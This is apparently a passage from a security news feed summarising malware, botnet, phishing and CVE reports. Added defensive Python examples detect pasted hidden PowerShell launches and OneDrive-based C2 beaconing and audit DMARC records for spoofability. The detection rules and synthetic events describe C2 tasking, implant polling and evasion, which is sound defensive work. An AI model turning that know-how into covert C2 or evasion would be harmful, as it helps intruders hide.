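    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 3 is the earliest signal and the cheapest to tune: a hidden-window PowerShell whose parent is the terminal the user pasted into is rare outside this social-engineering pattern. Rule 2 catches the later stage even if the HTA was fetched some other way.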
3.5.24 |
Virus |
A recent report by SentinelOne outlines changes observed in recent variants of the macOS malware Adload. The latest variants come with capabilities that let them evade the current Apple XProtect signatures. Adload has been present in the macOS landscape for several years, is known to be distributed via drive-by downloads and is often used to hijack browser search results, inject ads into web pages or deliver various payloads to victims. |
||
3.5.24 |
Virus |
ZLoader, a modular trojan, has implemented anti-analysis capabilities that appear to be lifted from the ZeuS source code. This 'new' ability lets ZLoader refuse to run on any machine other than the one where the initial infection occurred, stopping further stages from deploying elsewhere, in the hope of hindering in-depth analysis. |
||
3.5.24 |
BOTNET |
According to a recent report from FortiGuard Labs, a new botnet variant dubbed Goldoon has been observed in the wild. The malware propagates by exploiting an old D-Link vulnerability from 2015, CVE-2015-2051. Goldoon can establish persistence on the affected device and execute commands received from C2 servers. The attackers might use it to gain control over infected devices, collect system information and perform various forms of distributed denial-of-service (DDoS) attacks. |
||
3.5.24 |
BirdyClient malware leverages Microsoft Graph API for C&C communication |
Virus |
An increasing number of threats have begun to leverage the Microsoft Graph API, usually to facilitate communications with command-and-control (C&C) infrastructure hosted on Microsoft cloud services. The technique was most recently used in an attack against an organization in Ukraine, where a previously undocumented piece of malware called BirdyClient used the Graph API to leverage Microsoft OneDrive for C&C purposes. |
|
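C2 over the Graph API blends into normal Microsoft 365 traffic, so the useful signals are which process talks to Graph and how regularly it does so, rather than the destination itself. The following is an added example, not code from the report on BirdyClient: two detection rules over constructed EDR-style network events (timestamp, process image, host, URL path). The allowlist is an assumption to be replaced with a baseline from your own estate, and "updatesvc.exe", the timestamps and the OneDrive item path are invented.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean

GRAPH_HOST = "graph.microsoft.com"
DRIVE_PATHS = ("/v1.0/me/drive", "/v1.0/drives/", "/beta/me/drive")
# Processes expected to use Graph/OneDrive on a workstation (assumption for the example).
GRAPH_ALLOWLIST = {"onedrive.exe", "teams.exe", "ms-teams.exe", "outlook.exe",
                   "msedge.exe", "chrome.exe", "winword.exe", "excel.exe"}

# Constructed network events: (timestamp, process image, destination host, URL path).
# The implant polls one file in the victim's OneDrive every five minutes for tasking.
SAMPLE_EVENTS = [
    ("2024-05-02T09:00:00", "OneDrive.exe", GRAPH_HOST, "/v1.0/me/drive/root/children"),
    ("2024-05-02T09:00:05", "updatesvc.exe", "login.microsoftonline.com", "/common/oauth2/v2.0/token"),
    ("2024-05-02T09:00:06", "updatesvc.exe", GRAPH_HOST, "/v1.0/me/drive/root:/tasks.txt:/content"),
    ("2024-05-02T09:05:06", "updatesvc.exe", GRAPH_HOST, "/v1.0/me/drive/root:/tasks.txt:/content"),
    ("2024-05-02T09:10:07", "updatesvc.exe", GRAPH_HOST, "/v1.0/me/drive/root:/tasks.txt:/content"),
    ("2024-05-02T09:15:05", "updatesvc.exe", GRAPH_HOST, "/v1.0/me/drive/root:/tasks.txt:/content"),
    ("2024-05-02T09:17:00", "OneDrive.exe", GRAPH_HOST, "/v1.0/me/drive/root/children"),
    ("2024-05-02T11:42:00", "OneDrive.exe", GRAPH_HOST, "/v1.0/me/drive/root/children"),
]

def detect_graph_c2(events, min_requests=4, max_jitter=0.10):
    """Return findings as (rule, image, detail) tuples."""
    findings = []
    seen_unexpected = set()
    drive_hits = defaultdict(list)
    for ts, image, host, path in events:
        img = image.lower()
        if host != GRAPH_HOST or not path.startswith(DRIVE_PATHS):
            continue
        drive_hits[img].append(datetime.fromisoformat(ts))
        # Rule 1: OneDrive content reached over Graph by a process outside the baseline.
        if img not in GRAPH_ALLOWLIST and img not in seen_unexpected:
            seen_unexpected.add(img)
            findings.append(("graph_drive_from_unexpected_process", img, f"first seen {ts} {path}"))
    # Rule 2: machine-regular polling of drive items (beacon cadence), whatever the process name.
    for img, times in drive_hits.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and max(abs(g - avg) for g in gaps) <= max_jitter * avg:
            findings.append(("regular_graph_polling", img, f"{len(times)} requests, ~{avg:.0f}s apart"))
    return findings

if __name__ == "__main__":
    for rule, img, detail in detect_graph_c2(SAMPLE_EVENTS):
        print(f"{rule}: {img} ({detail})")
```

Rule 2 matters because an implant injected into an allowlisted process defeats rule 1; a human using OneDrive does not fetch the same item at a fixed interval for hours. Raise max_jitter if the implant adds sleep randomisation, and pair it with the token request to login.microsoftonline.com from the same process.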
3.5.24 |
The DarkGate loader has been very actively distributed over the last year. Numerous email campaigns have leveraged various attack chains to deliver the DarkGate payload: some emails contain direct download links, while others use attachments (PDF, ZIP, etc.) to initiate delivery. |
|||
3.5.24 |
Virus |
Dwphon is a recently identified malware variant targeting the Android platform. It can collect information about the infected device and the applications installed on it, as well as some confidential personal information. Dwphon may consist of several distinct modules, each with its own functions and C2 instructions. |
||
3.5.24 |
Virus |
No countries or financial institutions are exempt from having their brands abused to lure mobile users into installing Android malware—a trend that continues to grow. Symantec has recently observed an actor actively targeting users in Kazakhstan with the SpyNote RAT. |
||
3.5.24 |
GuLoader campaign targeting industries in Russian-speaking countries |
CAMPAIGN |
An actor has been observed running two email campaigns with different social engineering tactics that lead to GuLoader. Both campaigns target industries in Russian-speaking countries such as Russia, Belarus, Kyrgyzstan and Kazakhstan. |
|
3.5.24 |
Papers |
Subgraph representation learning is a technique for analyzing local structures (or shapes) within complex networks. Enabled by recent developments in scalable Graph Neural Networks (GNNs), this approach encodes relational information at a subgroup level (multiple connected nodes) rather than at a node level of abstraction. |
||
3.5.24 |
Trojan |
The Black Lotus Labs team at Lumen Technologies is tracking a malware platform we’ve named Cuttlefish, that targets networking equipment, specifically enterprise-grade small office/home office (SOHO) routers. |
||
3.5.24 |
Backdoor |
Playing Possum: What's the Wpeeper Backdoor Up To? |
||
3.5.24 |
BOTNET |
New “Goldoon” Botnet Targeting D-Link Devices |
||
3.5.24 |
|
Graph: Growing number of threats leveraging Microsoft API |
||
3.5.24 |
CERT |
North Korean Actors Exploit Weak DMARC Security Policies to Mask Spearphishing Efforts |
||
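The entry above is a headline only; the weakness it refers to is a DMARC record that exists but does not enforce anything (p=none, or a partial pct), so a spoofed From: header passes straight through. The following is an added example, not part of the advisory: a small DMARC record assessor that parses the tag=value syntax and reports why a domain can still be spoofed. The sample records and domain names are constructed.

```python
# Constructed DMARC TXT records for hypothetical domains; None means no record published.
SAMPLE_RECORDS = {
    "reporting-only.example": "v=DMARC1; p=none; rua=mailto:dmarc@reporting-only.example",
    "partial.example":        "v=DMARC1; p=quarantine; pct=20; sp=none",
    "enforcing.example":      "v=DMARC1; p=reject; rua=mailto:dmarc@enforcing.example",
    "no-record.example":      None,
}

def parse_dmarc(record):
    """Split a DMARC record into lower-cased tag -> value pairs."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags

def assess_dmarc(record):
    """Return (enforcing, findings). A domain is enforcing only when every
    failing message, for the domain and its subdomains, is quarantined or rejected."""
    if record is None:
        return False, ["no DMARC record: receivers apply no policy to spoofed mail"]
    if not record.strip().lower().startswith("v=dmarc1"):
        return False, ["record does not begin with v=DMARC1; receivers ignore it"]
    tags = parse_dmarc(record)
    p = tags.get("p", "").lower()
    sp = tags.get("sp", p).lower()          # sp= defaults to the p= policy
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 100
    if p not in ("none", "quarantine", "reject"):
        return False, ["missing or invalid p= tag; record is treated as invalid"]
    findings = []
    if p == "none":
        findings.append("p=none: spoofed mail is delivered and merely reported")
    if p != "none" and sp == "none":
        findings.append("sp=none: subdomains can still be spoofed")
    if pct < 100:
        findings.append(f"pct={pct}: only {pct}% of failing mail gets the policy")
    if "rua" not in tags:
        findings.append("no rua= address: spoofing attempts go unreported")
    enforcing = p in ("quarantine", "reject") and sp != "none" and pct == 100
    return enforcing, findings

def audit(records):
    """Assess every domain and return {domain: (enforcing, findings)}."""
    return {domain: assess_dmarc(rec) for domain, rec in records.items()}

if __name__ == "__main__":
    for domain, (ok, findings) in audit(SAMPLE_RECORDS).items():
        print(f"{domain}: {'ENFORCING' if ok else 'SPOOFABLE'}")
        for f in findings:
            print(f"  - {f}")
```

To feed it real records, fetch the TXT record at the _dmarc label, for example with `dig +short TXT _dmarc.example.com`, and pass the quoted string (or None if the lookup is empty). Note that p=reject on the organisational domain does nothing for a subdomain if sp=none is set, which is why the assessor checks both.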
3.5.24 |
CVE |
(CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol |
||
3.5.24 |
CVE |
(CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol |
||
3.5.24 |
CVE |
(CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol |
||
3.5.24 |
CVE |
(CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol |
||
3.5.24 |
Vulnerability |
“Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps |
||
1.5.24 |
Trojan |
Zloader Learns Old Tricks |
||